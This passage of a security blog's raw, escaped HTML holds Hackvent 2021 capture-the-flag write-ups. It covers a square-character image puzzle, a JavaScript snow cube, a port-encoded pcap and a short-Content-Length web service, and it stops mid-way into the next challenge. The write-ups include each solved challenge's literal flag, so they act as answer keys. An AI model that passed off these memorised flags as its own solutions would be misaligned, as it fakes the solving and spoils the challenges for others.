1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1b\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b
\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u
2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1b\u2b1c\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1b\u2b1b\u2b1c\u2b1c\u2b1c\u2b1b\u2b1c\u2b
1c\u2b1b\u2b1c\u2b1c\u2b1c<\/pre>\n\n\n\n<p>If we open this in a text editor and resize it accordingly we can read the flag. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"735\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-1024x735.png\" alt=\"\" class=\"wp-image-1765\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-1024x735.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-300x215.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol-768x552.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/sol.png 1526w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{Too_K3wL_F0R_YuLe!}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.06] Snow Cube<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11.png\" alt=\"\" class=\"wp-image-1711\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11.png 834w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11-300x42.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-11-768x107.png 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>Dr Nick<\/em>. 
Stay out of blizzards!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The Easter bunny sent a gift to Santa &#8211; what is usually a crystal sphere seemed a bit too boring, so it&#8217;s a cube!<\/p>\n\n\n\n<p>The snow seems to be falling somewhat strangely, is it possible that there&#8217;s a message hidden somewhere?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Resources<\/h2>\n\n\n\n<p>Please don&#8217;t stop the container when you&#8217;re done: everyone is using the same instance. If you stop it, others will have to restart it. And please don&#8217;t be a&nbsp;<code>*@#!%<\/code>. Everyone can write a script to stop the instance, but all that would do is take the fun away from others!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"846\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-1024x846.png\" alt=\"\" class=\"wp-image-1712\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-1024x846.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-300x248.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12-768x634.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-12.png 1136w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I copied the <a rel=\"noreferrer noopener\" href=\"https:\/\/sigterm.ch\/stuff\/hv21\/snowman06.html\" target=\"_blank\">source code<\/a> to debug it with <a rel=\"noreferrer noopener\" href=\"https:\/\/jsfiddle.net\" target=\"_blank\">https:\/\/jsfiddle.net<\/a>. 
<\/p>\n\n\n\n<p>At the beginning of the code we can spot that alpha is calculated differently if &#8220;s&#8221; is set to true:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">const canvas = document.getElementById(\"canvasSwonCube\");\nconst context = canvas.getContext(\"2d\");\nlet alpha = 0;\nlet beta = 0;\nlet s = false;\nlet a = canvas.width;\ncanvas.addEventListener('keydown', e => s = (e.key === 's'));\ncanvas.addEventListener('keyup', e => s = false);\ncanvas.addEventListener('mousemove', e => {\n\tvar rect = e.target.getBoundingClientRect();\n\talpha = s?((e.clientX-rect.left-a\/2)*7\/a):Math.sin(((e.clientX-rect.left-a\/2)*7\/a));\n\tbeta = Math.sin(((e.clientY-rect.top-a\/2)*7\/a));\n});\n<\/pre>\n\n\n\n<p>Let&#8217;s change &#8220;s&#8221; to true and observe the snowman in the output window of JSFiddle. If we change the view and let the snowman look to the right side, we can observe characters coming down in the snow.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"884\" height=\"776\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49.png\" alt=\"\" class=\"wp-image-1768\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49.png 884w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49-300x263.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-49-768x674.png 768w\" sizes=\"auto, (max-width: 884px) 100vw, 884px\" \/><\/figure>\n\n\n\n<p>By collecting all the characters (this was not too easy!) 
we get the flag.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{M3SSAGE_OUT_OF_FLAKES}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.07] Grinch&#8217;s Portscan<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"828\" height=\"126\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13.png\" alt=\"\" class=\"wp-image-1713\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13.png 828w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13-300x46.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-13-768x117.png 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>wangibangi<\/em>. Watch your port(e)s around x-mas!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves port-scanned grinch&#8217;s server and noticed something strange.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>There&#8217;s a secret message hidden in the&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/a343d168-3e6e-42b7-af30-b27c1c03de12.pcap\" target=\"_blank\" rel=\"noreferrer noopener\">packet capture<\/a>, can you find it?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>After fiddling around for a bit in Wireshark I could find the flag. It is encoded in the ports that are requested: the ports on which the server replies are the valid characters. 
I used the following filter to get all matching packets:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ip.src == 172.16.66.10 and tcp.len &gt; 0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Screenshot-from-2021-12-07-09-50-31-1024x429.png\" alt=\"\" class=\"wp-image-1769\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{c0nfuse_Portsc4nn3rs}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.08] Flag Service<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"106\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14.png\" alt=\"\" class=\"wp-image-1714\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14-300x39.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-14-768x99.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>nichtseb<\/em>&nbsp;and&nbsp;<em>logical overflow<\/em>. Keep away from the white flags (never give up)!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa has set up a web service for you to receive your flag for today. Unfortunately, the flag doesn&#8217;t seem to reach you.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Resources<\/h2>\n\n\n\n<p>Please don&#8217;t stop the container when you&#8217;re done: everyone is using the same instance. If you stop it, others will have to restart it. And please don&#8217;t be a&nbsp;<code>*@#!%<\/code>. 
Anyone can write a script to stop the instance again and again, but all that would do is take the fun away from others!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"434\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-1024x434.png\" alt=\"\" class=\"wp-image-1715\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-1024x434.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-300x127.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-768x325.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-1536x651.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-15-2048x868.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This webserver returns a wrong (too short) Content-Length header. Browsers and other clients like curl only download the number of bytes specified in this header. We can see that the response from the server is cut short, because the HTML code is not correctly terminated. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ curl 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land\n&lt;!DOCTYPE html>\n    &lt;html>\n    &lt;head>\n        &lt;meta charset=\"utf-8\" \/>\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.googleapis.com\">\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.gstatic.com\" crossorigin>\n        &lt;link href=\"https:\/\/fonts.googleapis.com\/css2?family=IBM+Plex+Mono&amp;display=swap\" rel=\"stylesheet\">\n        &lt;style>\n        body{font-family: 'IBM Plex Mono', monospace;height: 100vh !important;background-image: url(\"https:\/\/source.unsplash.com\/random\");-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;background-color:#131627;color:#fff;overflow:hidden;}\n        ::selection{background-color:rgba(0, 0, 0, 0);}\n        #flex-wrapper{position:absolute;top:0;bottom:0;right:0;left:0;-ms-flex-direction:row;-ms-flex-align:center;display:-webkit-flex;display:flex}#container{margin:auto; z-index: 10; padding:25px;}#container *{margin:0}h1{text-align:center;font-size:60px;color:#131627;text-shadow:0 0 5px #fff;opacity:0;-webkit-animation:fade-in 3s ease-in 0s forwards;-moz-animation:fade-in 3s ease-in 0s forwards;-o-animation:fade-in 3s ease-in 0s forwards;animation:fade-in 3s ease-in 0s forwards}h2{font-size:50px;text-shadow:0 0 5px orange;text-align:center;opacity:0;-webkit-animation:fade-in 3s ease-in .5s forwards;-moz-animation:fade-in 3s ease-in .5s forwards;-o-animation:fade-in 3s ease-in .5s forwards;animation:fade-in 3s ease-in .5s forwards}@-webkit-keyframes fade-in{from{opacity:0}to{opacity:1}}@-moz-keyframes fade-in{from{opacity:0}to{opacity:1}}@-o-keyframes fade-in{from{opacity:0}to{opacity:1}}@keyframes 
fade-in{from{opacity:0}to{opacity:1}}\n        &lt;\/style>\n        &lt;title>Flag Service&lt;\/title>\n    &lt;\/head>\n    &lt;body>\n        &lt;div id=\"flex-wrapper\">\n        &lt;div id=\"container\">\n            &lt;h1>Thanks for using the Flag service.&lt;br\/> Your Flag is:&lt;\/h1>\n            &lt;h2><\/pre>\n\n\n\n<p>Fortunately, curl has a flag to ignore the content-length. This way we can get the whole website and read the flag.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ curl 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land -v --ignore-content-length\n*   Trying 152.96.7.2:80...\n* TCP_NODELAY set\n* Connected to 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land (152.96.7.2) port 80 (#0)\n> GET \/ HTTP\/1.1\n> Host: 6cd40b58-94d6-48b7-ba97-5ee13727a051.rdocker.vuln.land\n> User-Agent: curl\/7.68.0\n> Accept: *\/*\n>\n* Mark bundle as not supporting multiuse\n&lt; HTTP\/1.1 200 OK\n&lt; Connection: close\n&lt; Content-Type: text\/html\n&lt; Content-Length: 1878\n&lt;\n&lt;!DOCTYPE html>\n    &lt;html>\n    &lt;head>\n        &lt;meta charset=\"utf-8\" \/>\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.googleapis.com\">\n        &lt;link rel=\"preconnect\" href=\"https:\/\/fonts.gstatic.com\" crossorigin>\n        &lt;link href=\"https:\/\/fonts.googleapis.com\/css2?family=IBM+Plex+Mono&amp;display=swap\" rel=\"stylesheet\">\n        &lt;style>\n        body{font-family: 'IBM Plex Mono', monospace;height: 100vh !important;background-image: url(\"https:\/\/source.unsplash.com\/random\");-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;background-color:#131627;color:#fff;overflow:hidden;}\n        ::selection{background-color:rgba(0, 0, 0, 0);}\n        
#flex-wrapper{position:absolute;top:0;bottom:0;right:0;left:0;-ms-flex-direction:row;-ms-flex-align:center;display:-webkit-flex;display:flex}#container{margin:auto; z-index: 10; padding:25px;}#container *{margin:0}h1{text-align:center;font-size:60px;color:#131627;text-shadow:0 0 5px #fff;opacity:0;-webkit-animation:fade-in 3s ease-in 0s forwards;-moz-animation:fade-in 3s ease-in 0s forwards;-o-animation:fade-in 3s ease-in 0s forwards;animation:fade-in 3s ease-in 0s forwards}h2{font-size:50px;text-shadow:0 0 5px orange;text-align:center;opacity:0;-webkit-animation:fade-in 3s ease-in .5s forwards;-moz-animation:fade-in 3s ease-in .5s forwards;-o-animation:fade-in 3s ease-in .5s forwards;animation:fade-in 3s ease-in .5s forwards}@-webkit-keyframes fade-in{from{opacity:0}to{opacity:1}}@-moz-keyframes fade-in{from{opacity:0}to{opacity:1}}@-o-keyframes fade-in{from{opacity:0}to{opacity:1}}@keyframes fade-in{from{opacity:0}to{opacity:1}}\n        &lt;\/style>\n        &lt;title>Flag Service&lt;\/title>\n    &lt;\/head>\n    &lt;body>\n        &lt;div id=\"flex-wrapper\">\n        &lt;div id=\"container\">\n            &lt;h1>Thanks for using the Flag service.&lt;br\/> Your Flag is:&lt;\/h1>\n            &lt;h2>HV21{4lw4y5_c0un7_y0ur53lf_d0n7_7ru57_7h3_53rv3r}&lt;\/h2>\n            &lt;\/div>\n        &lt;\/div>\n        &lt;\/div>\n    &lt;\/body>\n&lt;\/html>\n* Closing connection 0<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{4lw4y5_c0un7_y0ur53lf_d0n7_7ru57_7h3_53rv3r}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.09] Brother Santa<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"118\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17.png\" alt=\"\" class=\"wp-image-1717\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17.png 822w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-17-768x110.png 768w\" sizes=\"auto, (max-width: 822px) 100vw, 822px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>brp64<\/em>. Amen!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Ever security minded, Santa is. So switched to a&nbsp;<em>prime<\/em>&nbsp;encoding system he has, after contemplating for long.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"726\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-1024x726.png\" alt=\"\" class=\"wp-image-1718\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-1024x726.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-18-300x213.png 300w, 